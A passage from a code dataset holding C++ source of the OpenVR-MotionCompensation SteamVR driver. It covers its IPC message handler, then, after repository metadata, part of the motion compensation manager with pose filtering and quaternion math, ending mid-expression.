reply.msg.ipc_ClientConnect.ipcProcotolVersion = IPC_PROTOCOL_VERSION; uint32_t clientId = 0; if (message.msg.ipc_ClientConnect.ipcProcotolVersion == IPC_PROTOCOL_VERSION) { clientId = _this->_ipcClientIdNext++; _this->_ipcEndpoints.insert({ clientId, queue }); reply.msg.ipc_ClientConnect.clientId = clientId; reply.status = ipc::ReplyStatus::Ok; LOG(INFO) << "New client connected: endpoint \"" << message.msg.ipc_ClientConnect.queueName << "\", cliendId " << clientId; } else { reply.msg.ipc_ClientConnect.clientId = 0; reply.status = ipc::ReplyStatus::InvalidVersion; LOG(INFO) << "Client (endpoint \"" << message.msg.ipc_ClientConnect.queueName << "\") reports incompatible ipc version " << message.msg.ipc_ClientConnect.ipcProcotolVersion; } _this->sendReply(clientId, reply); } catch (std::exception & e) { LOG(ERROR) << "Error during client connect: " << e.what(); } } break; case ipc::RequestType::IPC_ClientDisconnect: { ipc::Reply reply(ipc::ReplyType::GenericReply); reply.messageId = message.msg.ipc_ClientDisconnect.messageId; auto i = _this->_ipcEndpoints.find(message.msg.ipc_ClientDisconnect.clientId); if (i != _this->_ipcEndpoints.end()) { reply.status = ipc::ReplyStatus::Ok; LOG(INFO) << "Client disconnected: clientId " << message.msg.ipc_ClientDisconnect.clientId; if (reply.messageId != 0) { _this->sendReply(message.msg.ipc_ClientDisconnect.clientId, reply); } _this->_ipcEndpoints.erase(i); } else { LOG(ERROR) << "Error during client disconnect: unknown clientID " << message.msg.ipc_ClientDisconnect.clientId; } } break; case ipc::RequestType::IPC_Ping: { LOG(TRACE) << "Ping received: clientId " << message.msg.ipc_Ping.clientId << ", nonce " << message.msg.ipc_Ping.nonce; ipc::Reply reply(ipc::ReplyType::IPC_Ping); reply.messageId = message.msg.ipc_Ping.messageId; reply.status = ipc::ReplyStatus::Ok; reply.msg.ipc_Ping.nonce = message.msg.ipc_Ping.nonce; _this->sendReply(message.msg.ipc_ClientDisconnect.clientId, reply); } break; case ipc::RequestType::DeviceManipulation_GetDeviceInfo: { ipc::Reply resp(ipc::ReplyType::GenericReply); resp.messageId = message.msg.ovr_GenericDeviceIdMessage.messageId; if (message.msg.ovr_GenericDeviceIdMessage.OpenVRId >= vr::k_unMaxTrackedDeviceCount) { resp.status = ipc::ReplyStatus::InvalidId; } else { DeviceManipulationHandle* info = driver->getDeviceManipulationHandleById(message.msg.ovr_GenericDeviceIdMessage.OpenVRId); if (!info) { resp.status = ipc::ReplyStatus::NotFound; resp.msg.dm_deviceInfo.deviceClass = vr::ETrackedDeviceClass::TrackedDeviceClass_Invalid; } else { resp.status = ipc::ReplyStatus::Ok; resp.msg.dm_deviceInfo.OpenVRId = message.msg.ovr_GenericDeviceIdMessage.OpenVRId; resp.msg.dm_deviceInfo.deviceMode = info->getDeviceMode(); resp.msg.dm_deviceInfo.deviceClass = info->deviceClass(); } } /*if (resp.status != ipc::ReplyStatus::Ok) { LOG(ERROR) << "Error while getting device info: Error code " << (int)resp.status; }*/ if (resp.messageId != 0) { _this->sendReply(message.msg.ovr_GenericDeviceIdMessage.clientId, resp); } } break; case ipc::RequestType::DeviceManipulation_MotionCompensationMode: { // Create reply message ipc::Reply resp(ipc::ReplyType::GenericReply); resp.messageId = message.msg.dm_MotionCompensationMode.messageId; if (message.msg.dm_MotionCompensationMode.MCdeviceId > vr::k_unMaxTrackedDeviceCount || (message.msg.dm_MotionCompensationMode.RTdeviceId > vr::k_unMaxTrackedDeviceCount && message.msg.dm_MotionCompensationMode.CompensationMode == MotionCompensationMode::ReferenceTracker)) { resp.status = ipc::ReplyStatus::InvalidId; } else { DeviceManipulationHandle* MCdevice = driver->getDeviceManipulationHandleById(message.msg.dm_MotionCompensationMode.MCdeviceId); DeviceManipulationHandle* RTdevice = driver->getDeviceManipulationHandleById(message.msg.dm_MotionCompensationMode.RTdeviceId); int MCdeviceID = message.msg.dm_MotionCompensationMode.MCdeviceId; int RTdeviceID = message.msg.dm_MotionCompensationMode.RTdeviceId; if (!MCdevice) { LOG(ERROR) << "DeviceManipulation_MotionCompensationMode: MCdevice not found"; resp.status = ipc::ReplyStatus::NotFound; } else if (!RTdevice) { LOG(ERROR) << "DeviceManipulation_MotionCompensationMode: RTdevice not found"; resp.status = ipc::ReplyStatus::NotFound; } else { auto serverDriver = ServerDriver::getInstance(); if (serverDriver) { if (message.msg.dm_MotionCompensationMode.CompensationMode == MotionCompensationMode::ReferenceTracker) { LOG(INFO) << "Setting driver into motion compensation mode"; LOG(INFO) << "Tracker OpenVR Id: " << message.msg.dm_MotionCompensationMode.RTdeviceId; LOG(INFO) << "HMD OpenVR Id: " << message.msg.dm_MotionCompensationMode.MCdeviceId; // Check if an old device needs a mode change if (serverDriver->motionCompensation().getMotionCompensationMode() == MotionCompensationMode::ReferenceTracker) { // New MCdevice is different from old if (serverDriver->motionCompensation().getMCdeviceID() != MCdeviceID) { // Set old MCdevice to default DeviceManipulationHandle* OldMCdevice = driver->getDeviceManipulationHandleById(serverDriver->motionCompensation().getMCdeviceID()); OldMCdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::Default); // Set new MCdevice to motion compensated MCdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::MotionCompensated); serverDriver->motionCompensation().setNewReferenceTracker(MCdeviceID); } // New RTdevice is different from old if (serverDriver->motionCompensation().getRTdeviceID() != RTdeviceID) { // Set old RTdevice to default DeviceManipulationHandle* OldRTdevice = driver->getDeviceManipulationHandleById(serverDriver->motionCompensation().getRTdeviceID()); OldRTdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::Default); // Set new RTdevice to reference tracker RTdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::ReferenceTracker); serverDriver->motionCompensation().setNewReferenceTracker(RTdeviceID); } } else { // Activate motion compensation mode for specified device MCdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::MotionCompensated); RTdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::ReferenceTracker); // Set motion compensation mode serverDriver->motionCompensation().setMotionCompensationMode(MotionCompensationMode::ReferenceTracker, MCdeviceID, RTdeviceID); } } else if (message.msg.dm_MotionCompensationMode.CompensationMode == MotionCompensationMode::Disabled) { LOG(INFO) << "Setting driver into default mode"; MCdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::Default); RTdevice->setMotionCompensationDeviceMode(MotionCompensationDeviceMode::Default); // Reset and set some vars for every device serverDriver->motionCompensation().setMotionCompensationMode(MotionCompensationMode::Disabled, -1, -1); } resp.status = ipc::ReplyStatus::Ok; } else { resp.status = ipc::ReplyStatus::UnknownError; } } } if (resp.status != ipc::ReplyStatus::Ok) { LOG(ERROR) << "Error while setting device into motion compensation mode: Error code " << (int)resp.status; LOG(ERROR) << "MCdeviceID: " << message.msg.dm_MotionCompensationMode.MCdeviceId << ", RTdeviceID: " << message.msg.dm_MotionCompensationMode.RTdeviceId; } if (resp.messageId != 0) { _this->sendReply(message.msg.dm_MotionCompensationMode.clientId, resp); } } break; case ipc::RequestType::DeviceManipulation_SetMotionCompensationProperties: { ipc::Reply resp(ipc::ReplyType::GenericReply); resp.messageId = message.msg.dm_SetMotionCompensationProperties.messageId; auto serverDriver = ServerDriver::getInstance(); if (serverDriver) { LOG(INFO) << "Setting driver motion compensation properties:"; LOG(INFO) << "LPF_Beta: " << message.msg.dm_SetMotionCompensationProperties.LPFBeta; LOG(INFO) << "samples: " << message.msg.dm_SetMotionCompensationProperties.samples; LOG(INFO) << "set Zero: " << message.msg.dm_SetMotionCompensationProperties.setZero; LOG(INFO) << "End of property listing"; serverDriver->motionCompensation().setLpfBeta(message.msg.dm_SetMotionCompensationProperties.LPFBeta); serverDriver->motionCompensation().setAlpha(message.msg.dm_SetMotionCompensationProperties.samples); serverDriver->motionCompensation().setZeroMode(message.msg.dm_SetMotionCompensationProperties.setZero); resp.status = ipc::ReplyStatus::Ok; } else { resp.status = ipc::ReplyStatus::UnknownError; } if (resp.status != ipc::ReplyStatus::Ok) { LOG(ERROR) << "Error while setting motion compensation properties: Error code " << (int)resp.status; } if (resp.messageId != 0) { _this->sendReply(message.msg.dm_SetMotionCompensationProperties.clientId, resp); } } break; case ipc::RequestType::DeviceManipulation_ResetRefZeroPose: { ipc::Reply resp(ipc::ReplyType::GenericReply); resp.messageId = message.msg.dm_SetMotionCompensationProperties.messageId; auto serverDriver = ServerDriver::getInstance(); if (serverDriver) { LOG(INFO) << "Resetting reference zero pose"; serverDriver->motionCompensation().resetZeroPose(); resp.status = ipc::ReplyStatus::Ok; } else { resp.status = ipc::ReplyStatus::UnknownError; } if (resp.status != ipc::ReplyStatus::Ok) { LOG(ERROR) << "Error while setting motion compensation properties: Error code " << (int)resp.status; } if (resp.messageId != 0) { _this->sendReply(message.msg.dm_SetMotionCompensationProperties.clientId, resp); } } break; case ipc::RequestType::DeviceManipulation_SetOffsets: { ipc::Reply resp(ipc::ReplyType::GenericReply); resp.messageId = message.msg.dm_SetOffsets.messageId; auto serverDriver = ServerDriver::getInstance(); if (serverDriver) { serverDriver->motionCompensation().setOffsets(message.msg.dm_SetOffsets.offsets); resp.status = ipc::ReplyStatus::Ok; } else { resp.status = ipc::ReplyStatus::UnknownError; } if (resp.status != ipc::ReplyStatus::Ok) { LOG(ERROR) << "Error while setting offsets: Error code " << (int)resp.status; } if (resp.messageId != 0) { _this->sendReply(message.msg.dm_SetOffsets.clientId, resp); } } break; case ipc::RequestType::DebugLogger_Settings: { ipc::Reply resp(ipc::ReplyType::GenericReply); resp.messageId = message.msg.dl_Settings.messageId; auto serverDriver = ServerDriver::getInstance(); if (serverDriver) { if (message.msg.dl_Settings.enabled) { /*if (!serverDriver->motionCompensation().StartDebugData()) { LOG(INFO) << "Could not start debug logger: Motion Compensation must be enabled"; resp.status = ipc::ReplyStatus::InvalidId; } else { LOG(INFO) << "Debug logger enabled"; LOG(INFO) << "Max debug data points = " << message.msg.dl_Settings.MaxDebugPoints; resp.status = ipc::ReplyStatus::Ok; } */ resp.status = ipc::ReplyStatus::Ok; } else { LOG(INFO) << "Debug logger disabled"; //serverDriver->motionCompensation().StopDebugData(); resp.status = ipc::ReplyStatus::Ok; } } else { resp.status = ipc::ReplyStatus::UnknownError; } if (resp.status != ipc::ReplyStatus::Ok) { LOG(ERROR) << "Error while starting debug logger: Error code " << (int)resp.status; } if (resp.messageId != 0) { _this->sendReply(message.msg.dl_Settings.clientId, resp); } } break; default: LOG(ERROR) << "Error in ipc server receive loop: Unknown message type (" << (int)message.type << ")"; break; } } else { LOG(ERROR) << "Error in ipc server receive loop: received size is wrong (" << recv_size << " != " << sizeof(ipc::Request) << ")"; } } } catch (std::exception & ex) { LOG(ERROR) << "Exception caught in ipc server receive loop: " << ex.what(); } } boost::interprocess::message_queue::remove(_this->_ipcQueueName.c_str()); } catch (std::exception & ex) { LOG(ERROR) << "Exception caught in ipc server thread: " << ex.what(); } _this->_ipcThreadRunning = false; LOG(DEBUG) << "CServerDriver::_ipcThreadFunc: thread stopped"; } void IpcShmCommunicator::sendReply(uint32_t clientId, const ipc::Reply& reply) { std::lock_guard<std::mutex> guard(_sendMutex); auto i = _ipcEndpoints.find(clientId); if (i != _ipcEndpoints.end()) { i->second->send(&reply, sizeof(ipc::Reply), 0); } else { LOG(ERROR) << "Error while sending reply: Unknown clientId " << clientId; } } } // end namespace driver } // end namespace vrmotioncompensation
17,558
C++
.cpp
410
33.034146
195
0.624444
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,193
MotionCompensationManager.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/devicemanipulation/MotionCompensationManager.cpp
#include "MotionCompensationManager.h" #include "DeviceManipulationHandle.h" #include "../driver/ServerDriver.h" #include <cmath> #include <boost/math/constants/constants.hpp> #include <boost/interprocess/shared_memory_object.hpp> // driver namespace namespace vrmotioncompensation { namespace driver { MotionCompensationManager::MotionCompensationManager(ServerDriver* parent) : m_parent(parent) { try { // create shared memory _shdmem = { boost::interprocess::open_or_create, "OVRMC_MMFv1", boost::interprocess::read_write, 4096 }; _region = { _shdmem, boost::interprocess::read_write }; // get pointer address and fill it with data _Poffset = static_cast<MMFstruct_OVRMC_v1*>(_region.get_address()); *_Poffset = _Offset; LOG(INFO) << "Shared memory OVRMC_MMFv1 created"; } catch (boost::interprocess::interprocess_exception& e) { LOG(ERROR) << "Could not create or open shared memory. Error code " << e.get_error_code(); } } bool MotionCompensationManager::setMotionCompensationMode(MotionCompensationMode Mode, int McDevice, int RtDevice) { if (Mode == MotionCompensationMode::ReferenceTracker) { _RefPoseValid = false; _RefPoseValidCounter = 0; _ZeroPoseValid = false; _Enabled = true; setAlpha(_Samples); } else { _Enabled = false; } _McDeviceID = McDevice; _RtDeviceID = RtDevice; _Mode = Mode; return true; } void MotionCompensationManager::setNewMotionCompensatedDevice(int MCdevice) { _McDeviceID = MCdevice; } void MotionCompensationManager::setNewReferenceTracker(int RTdevice) { _RtDeviceID = RTdevice; _RefPoseValid = false; _ZeroPoseValid = false; } void MotionCompensationManager::setAlpha(uint32_t samples) { _Samples = samples; _Alpha = 2.0 / (1.0 + (double)samples); } void MotionCompensationManager::setZeroMode(bool setZero) { _SetZeroMode = setZero; _zeroVec(_RefVel); _zeroVec(_RefRotVel); _zeroVec(_RefAcc); _zeroVec(_RefRotAcc); } void MotionCompensationManager::setOffsets(MMFstruct_OVRMC_v1 offsets) { //_Offset.Translation = offsets.Translation; //_Offset.Rotation = offsets.Rotation; _Offset = offsets; *_Poffset = _Offset; } bool MotionCompensationManager::isZeroPoseValid() { return _ZeroPoseValid; } void MotionCompensationManager::resetZeroPose() { _ZeroPoseValid = false; } void MotionCompensationManager::setZeroPose(const vr::DriverPose_t& pose) { // convert pose from driver space to app space vr::HmdQuaternion_t tmpConj = vrmath::quaternionConjugate(pose.qWorldFromDriverRotation); // Save zero points _ZeroLock.lock(); _ZeroPos = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, pose.vecPosition, false) + pose.vecWorldFromDriverTranslation; _ZeroRot = pose.qWorldFromDriverRotation * pose.qRotation; _ZeroPoseValid = true; _ZeroLock.unlock(); } void MotionCompensationManager::updateRefPose(const vr::DriverPose_t& pose) { // From https://github.com/ValveSoftware/driver_hydra/blob/master/drivers/driver_hydra/driver_hydra.cpp Line 835: // "True acceleration is highly volatile, so it's not really reasonable to // extrapolate much from it anyway. Passing it as 0 from any driver should // be fine." // Line 832: // "The trade-off here is that setting a valid velocity causes the controllers // to jitter, but the controllers feel much more "alive" and lighter. // The jitter while stationary is more annoying than the laggy feeling caused // by disabling velocity (which effectively disables prediction for rendering)." // That means that we have to calculate the velocity to not interfere with the prediction for rendering // Oculus devices do use acceleration. It also seems that the HMD uses theses values for render-prediction vr::HmdVector3d_t Filter_vecPosition = { 0, 0, 0 }; vr::HmdVector3d_t Filter_vecVelocity = { 0, 0, 0 }; vr::HmdVector3d_t Filter_vecAcceleration = { 0, 0, 0 }; vr::HmdVector3d_t Filter_vecAngularVelocity = { 0, 0, 0 }; vr::HmdVector3d_t Filter_vecAngularAcceleration = { 0, 0, 0 }; vr::HmdVector3d_t RotEulerFilter = { 0, 0, 0 }; vr::HmdQuaternion_t tmpConj = vrmath::quaternionConjugate(pose.qWorldFromDriverRotation); // Get current time in microseconds and convert it to seconds long long now = std::chrono::duration_cast <std::chrono::microseconds>(std::chrono::system_clock::now().time_since_epoch()).count(); double tdiff = (double)(now - _RefTrackerLastTime) / 1.0E6 + (pose.poseTimeOffset - _RefTrackerLastPose.poseTimeOffset); // Position // Add a exponential median average filter if (_Samples >= 2) { // ----------------------------------------------------------------------------------------------- // // ----------------------------------------------------------------------------------------------- // // Position Filter_vecPosition.v[0] = DEMA(pose.vecPosition[0], 0); Filter_vecPosition.v[1] = DEMA(pose.vecPosition[1], 1); Filter_vecPosition.v[2] = DEMA(pose.vecPosition[2], 2); // ----------------------------------------------------------------------------------------------- // // ----------------------------------------------------------------------------------------------- // // Velocity and acceleration if (!_SetZeroMode) { Filter_vecVelocity.v[0] = vecVelocity(tdiff, Filter_vecPosition.v[0], _RefTrackerLastPose.vecPosition[0]); Filter_vecVelocity.v[1] = vecVelocity(tdiff, Filter_vecPosition.v[1], _RefTrackerLastPose.vecPosition[1]); Filter_vecVelocity.v[2] = vecVelocity(tdiff, Filter_vecPosition.v[2], _RefTrackerLastPose.vecPosition[2]); Filter_vecAcceleration.v[0] = vecAcceleration(tdiff, Filter_vecVelocity.v[0], _RefTrackerLastPose.vecVelocity[0]); Filter_vecAcceleration.v[1] = vecAcceleration(tdiff, Filter_vecVelocity.v[1], _RefTrackerLastPose.vecVelocity[1]); Filter_vecAcceleration.v[2] = vecAcceleration(tdiff, Filter_vecVelocity.v[2], _RefTrackerLastPose.vecVelocity[2]); } } else { _copyVec(Filter_vecPosition, pose.vecPosition); _copyVec(Filter_vecVelocity, pose.vecVelocity); } // convert pose from driver space to app space _RefLock.lock(); _RefPos = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, Filter_vecPosition, false) + pose.vecWorldFromDriverTranslation; _RefLock.unlock(); // ----------------------------------------------------------------------------------------------- // // ----------------------------------------------------------------------------------------------- // // Rotation if (_LpfBeta <= 0.9999) { // 1st stage _Filter_rotPosition[0] = lowPassFilterQuaternion(pose.qRotation, _Filter_rotPosition[0]); // 2nd stage _Filter_rotPosition[1] = lowPassFilterQuaternion(_Filter_rotPosition[0], _Filter_rotPosition[1]); vr::HmdVector3d_t RotEulerFilter = toEulerAngles(_Filter_rotPosition[1]); if (!_SetZeroMode) { Filter_vecAngularVelocity.v[0] = rotVelocity(tdiff, RotEulerFilter.v[0], _RotEulerFilterOld.v[0]); Filter_vecAngularVelocity.v[1] = rotVelocity(tdiff, RotEulerFilter.v[1], _RotEulerFilterOld.v[1]); Filter_vecAngularVelocity.v[2] = rotVelocity(tdiff, RotEulerFilter.v[2], _RotEulerFilterOld.v[2]); Filter_vecAngularAcceleration.v[0] = vecAcceleration(tdiff, Filter_vecAngularVelocity.v[0], _RefTrackerLastPose.vecAngularVelocity[0]); Filter_vecAngularAcceleration.v[1] = vecAcceleration(tdiff, Filter_vecAngularVelocity.v[1], _RefTrackerLastPose.vecAngularVelocity[1]); Filter_vecAngularAcceleration.v[2] = vecAcceleration(tdiff, Filter_vecAngularVelocity.v[2], _RefTrackerLastPose.vecAngularVelocity[2]); } } else { _Filter_rotPosition[1] = pose.qRotation; _copyVec(Filter_vecAngularVelocity, pose.vecAngularVelocity); _copyVec(Filter_vecAngularAcceleration, pose.vecAngularAcceleration); } // calculate orientation difference and its inverse vr::HmdQuaternion_t poseWorldRot = pose.qWorldFromDriverRotation * _Filter_rotPosition[1]; _RefLock.lock(); _ZeroLock.lock(); _RefRot = poseWorldRot * vrmath::quaternionConjugate(_ZeroRot); _RefRotInv = vrmath::quaternionConjugate(_RefRot); _ZeroLock.unlock(); _RefLock.unlock(); if (!_SetZeroMode) { // Convert velocity and acceleration values into app space _RefVelLock.lock(); _RefVel = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, Filter_vecVelocity, false); _RefRotVel = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, Filter_vecAngularVelocity, false); _RefAcc = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, Filter_vecAcceleration, false); _RefRotAcc = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, Filter_vecAngularAcceleration, false); _RefVelLock.unlock(); } // ----------------------------------------------------------------------------------------------- // // ----------------------------------------------------------------------------------------------- // // Wait 100 frames before setting reference pose to valid if (_RefPoseValidCounter > 100) { _RefPoseValid = true; } else { _RefPoseValidCounter++; } // Save last rotation and pose _RotEulerFilterOld = RotEulerFilter; _RefTrackerLastPose = pose; } bool MotionCompensationManager::applyMotionCompensation(vr::DriverPose_t& pose) { if (_Enabled && _ZeroPoseValid && _RefPoseValid) { // All filter calculations are done within the function for the reference tracker, because the HMD position is updated 3x more often. // Convert pose from driver space to app space vr::HmdQuaternion_t tmpConj = vrmath::quaternionConjugate(pose.qWorldFromDriverRotation); vr::HmdVector3d_t poseWorldPos = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, pose.vecPosition, false) + pose.vecWorldFromDriverTranslation; // Do motion compensation vr::HmdQuaternion_t poseWorldRot = pose.qWorldFromDriverRotation * pose.qRotation; _RefLock.lock(); _ZeroLock.lock(); vr::HmdVector3d_t compensatedPoseWorldPos = _ZeroPos + vrmath::quaternionRotateVector(_RefRot, _RefRotInv, poseWorldPos - _RefPos, true); _ZeroLock.unlock(); vr::HmdQuaternion_t compensatedPoseWorldRot = _RefRotInv * poseWorldRot; _RefLock.unlock(); // Translate the motion ref Velocity / Acceleration values into driver space and directly subtract them if (_SetZeroMode) { _zeroVec(pose.vecVelocity); _zeroVec(pose.vecAcceleration); _zeroVec(pose.vecAngularVelocity); _zeroVec(pose.vecAngularAcceleration); } else { // Translate the motion ref Velocity / Acceleration values into driver space and directly subtract them _RefVelLock.lock(); vr::HmdVector3d_t tmpPosVel = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, _RefVel, true); pose.vecVelocity[0] -= tmpPosVel.v[0]; pose.vecVelocity[1] -= tmpPosVel.v[1]; pose.vecVelocity[2] -= tmpPosVel.v[2]; vr::HmdVector3d_t tmpRotVel = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, _RefRotVel, true); pose.vecAngularVelocity[0] -= tmpRotVel.v[0]; pose.vecAngularVelocity[1] -= tmpRotVel.v[1]; pose.vecAngularVelocity[2] -= tmpRotVel.v[2]; vr::HmdVector3d_t tmpPosAcc = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, _RefAcc, true); pose.vecAcceleration[0] -= tmpPosAcc.v[0]; pose.vecAcceleration[1] -= tmpPosAcc.v[1]; pose.vecAcceleration[2] -= tmpPosAcc.v[2]; vr::HmdVector3d_t tmpRotAcc = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, _RefRotAcc, true); pose.vecAngularAcceleration[0] -= tmpRotAcc.v[0]; pose.vecAngularAcceleration[1] -= tmpRotAcc.v[1]; pose.vecAngularAcceleration[2] -= tmpRotAcc.v[2]; _RefVelLock.unlock(); } // convert back to driver space pose.qRotation = tmpConj * compensatedPoseWorldRot; vr::HmdVector3d_t adjPoseDriverPos = vrmath::quaternionRotateVector(pose.qWorldFromDriverRotation, tmpConj, compensatedPoseWorldPos - pose.vecWorldFromDriverTranslation, true); _copyVec(pose.vecPosition, adjPoseDriverPos.v); } return true; } void MotionCompensationManager::runFrame() { /*if (_Offset.Flags_1 & (1 << FLAG_ENABLE_MC) && _Mode == MotionCompensationMode::Disabled) { } else if (!(_Offset.Flags_1 & (1 << FLAG_ENABLE_MC)) && _Mode == MotionCompensationMode::ReferenceTracker) { setMotionCompensationMode(MotionCompensationMode::ReferenceTracker, -1, -1); }*/ } double MotionCompensationManager::vecVelocity(double time, const double vecPosition, const double Old_vecPosition) { double NewVelocity = 0.0; if (time != (double)0.0) { NewVelocity = (vecPosition - Old_vecPosition) / time; } return NewVelocity; } double MotionCompensationManager::vecAcceleration(double time, const double vecVelocity, const double Old_vecVelocity) { double NewAcceleration = 0.0; if (time != (double)0.0) { NewAcceleration = (vecVelocity - Old_vecVelocity) / time; } return NewAcceleration; } double MotionCompensationManager::rotVelocity(double time, const double vecAngle, const double Old_vecAngle) { double NewVelocity = 0.0; if (time != (double)0.0) { NewVelocity = (1 - angleDifference(vecAngle, Old_vecAngle)) / time; } return NewVelocity; } // Low Pass Filter for 3d Vectors double MotionCompensationManager::DEMA(const double RawData, int Axis) { _Filter_vecPosition[0].v[Axis] += _Alpha * (RawData - _Filter_vecPosition[1].v[Axis]); _Filter_vecPosition[1].v[Axis] += _Alpha * (_Filter_vecPosition[0].v[Axis] - _Filter_vecPosition[1].v[Axis]); return 2 * _Filter_vecPosition[0].v[Axis] - _Filter_vecPosition[1].v[Axis]; } // Low Pass Filter for 3d Vectors vr::HmdVector3d_t MotionCompensationManager::LPF(const double RawData[3], vr::HmdVector3d_t SmoothData) { vr::HmdVector3d_t RetVal; RetVal.v[0] = SmoothData.v[0] - (_LpfBeta * (SmoothData.v[0] - RawData[0])); RetVal.v[1] = SmoothData.v[1] - (_LpfBeta * (SmoothData.v[1] - RawData[1])); RetVal.v[2] = SmoothData.v[2] - (_LpfBeta * (SmoothData.v[2] - RawData[2])); return RetVal; } // Low Pass Filter for 3d Vectors vr::HmdVector3d_t MotionCompensationManager::LPF(vr::HmdVector3d_t RawData, vr::HmdVector3d_t SmoothData) { vr::HmdVector3d_t RetVal; RetVal.v[0] = SmoothData.v[0] - (_LpfBeta * (SmoothData.v[0] - RawData.v[0])); RetVal.v[1] = SmoothData.v[1] - (_LpfBeta * (SmoothData.v[1] - RawData.v[1])); RetVal.v[2] = SmoothData.v[2] - (_LpfBeta * (SmoothData.v[2] - RawData.v[2])); return RetVal; } // Low Pass Filter for quaternion vr::HmdQuaternion_t MotionCompensationManager::lowPassFilterQuaternion(vr::HmdQuaternion_t RawData, vr::HmdQuaternion_t SmoothData) { return slerp(SmoothData, RawData, _LpfBeta); } // Spherical Linear Interpolation for Quaternions vr::HmdQuaternion_t MotionCompensationManager::slerp(vr::HmdQuaternion_t q1, vr::HmdQuaternion_t q2, double lambda) { vr::HmdQuaternion_t qr; double dotproduct = q1.x * q2.x + q1.y * q2.y + q1.z * q2.z + q1.w * q2.w; // if q1 and q2 are the same, we can return either of the values if (dotproduct >= 1.0 || dotproduct <= -1.0) { return q1; } double theta, st, sut, sout, coeff1, coeff2; // algorithm adapted from Shoemake's paper lambda = lambda / 2.0; theta = (double)acos(dotproduct); if (theta < 0.0) theta = -theta; st = (double)sin(theta); sut = (double)sin(lambda * theta); sout = (double)sin((1 - lambda) * theta); coeff1 = sout / st; coeff2 = sut / st; qr.x = coeff1 * q1.x + coeff2 * q2.x; qr.y = coeff1 * q1.y + coeff2 * q2.y; qr.z = coeff1 * q1.z + coeff2 * q2.z; qr.w = coeff1 * q1.w + coeff2 * q2.w; //Normalize double norm = sqrt(qr.x * qr.x + qr.y * qr.y + qr.z * qr.z + qr.w * qr.w); qr.x /= norm; qr.y /= norm; qr.z /= norm; return qr; } // Convert Quaternion to Euler Angles in Radians vr::HmdVector3d_t MotionCompensationManager::toEulerAngles(vr::HmdQuaternion_t q) { vr::HmdVector3d_t angles; // roll (x-axis rotation) double sinr_cosp = 2 * (q.w * q.x + q.y * q.z); double cosr_cosp = 1 - 2 * (q.x * q.x + q.y * q.y); angles.v[0] = std::atan2(sinr_cosp, cosr_cosp); // pitch (y-axis rotation) double sinp = 2 * (q.w * q.y - q.z * q.x); if (std::abs(sinp) >= 1) { angles.v[1] = std::copysign(boost::math::constants::pi<double>() / 2, sinp); // use 90 degrees if out of range } else { angles.v[1] = std::asin(sinp); } // yaw (z-axis rotation) double siny_cosp = 2 * (q.w * q.z + q.x * q.y); double cosy_cosp = 1 - 2 * (q.y * q.y + q.z * q.z); angles.v[2] = std::atan2(siny_cosp, cosy_cosp); return angles; } // Returns the shortest difference between to angles const double MotionCompensationManager::angleDifference(double Raw, double New) { double diff = fmod((New - Raw + (double)180), (double)360) - (double)180; return diff < -(double)180 ? diff + (double)360 : diff; } vr::HmdVector3d_t MotionCompensationManager::transform(vr::HmdVector3d_t VecRotation, vr::HmdVector3d_t VecPosition, vr::HmdVector3d_t point) { // point is the user-input offset to the controller // VecRotation and VecPosition is the current reference-pose (Controller or input from Mover) vr::HmdQuaternion_t quat = vrmath::quaternionFromYawPitchRoll(VecRotation.v[0], VecRotation.v[1], VecRotation.v[2]); return transform(quat, VecPosition, point); } // Calculates the new coordinates of 'point', moved and rotated by VecRotation and VecPosition vr::HmdVector3d_t MotionCompensationManager::transform(vr::HmdQuaternion_t quat, vr::HmdVector3d_t VecPosition, vr::HmdVector3d_t point) { vr::HmdVector3d_t translation = vrmath::quaternionRotateVector(quat, VecPosition); return vrmath::quaternionRotateVector(quat, point) + translation; } // vr::HmdVector3d_t MotionCompensationManager::transform(vr::HmdVector3d_t VecRotation, vr::HmdVector3d_t VecPosition, vr::HmdVector3d_t centerOfRotation, vr::HmdVector3d_t point) { // point is the user-input offset to the controller // VecRotation and VecPosition is the current rig-pose vr::HmdQuaternion_t quat = vrmath::quaternionFromYawPitchRoll(VecRotation.v[0], VecRotation.v[1], VecRotation.v[2]); double n1 = quat.x * 2.f; double n2 = quat.y * 2.f; double n3 = quat.z * 2.f; double _n4 = quat.x * n1; double _n5 = quat.y * n2; double _n6 = quat.z * n3; double _n7 = quat.x * n2; double _n8 = quat.x * n3; double _n9 = quat.y * n3; double _n10 = quat.w * n1; double _n11 = quat.w * n2; double _n12 = quat.w * n3; vr::HmdVector3d_t translation = { (1 - (_n5 + _n6)) * (VecPosition.v[0]) + (_n7 - _n12) * (VecPosition.v[1]) + (_n8 + _n11) * (VecPosition.v[2]), (_n7 + _n12) * (VecPosition.v[0]) + (1 - (_n4 + _n6)) * (VecPosition.v[1]) + (_n9 - _n10) * (VecPosition.v[2]), (_n8 - _n11) * (VecPosition.v[0]) + (_n9 + _n10) * (VecPosition.v[1]) + (1 - (_n4 + _n5)) * (VecPosition.v[2]) }; return { (1.0 - (_n5 + _n6)) * (point.v[0] - centerOfRotation.v[0]) + (_n7 - _n12) * (point.v[1] - centerOfRotation.v[1]) + (_n8 + _n11) * (point.v[2] - centerOfRotation.v[2]) + centerOfRotation.v[0] + translation.v[0], (_n7 + 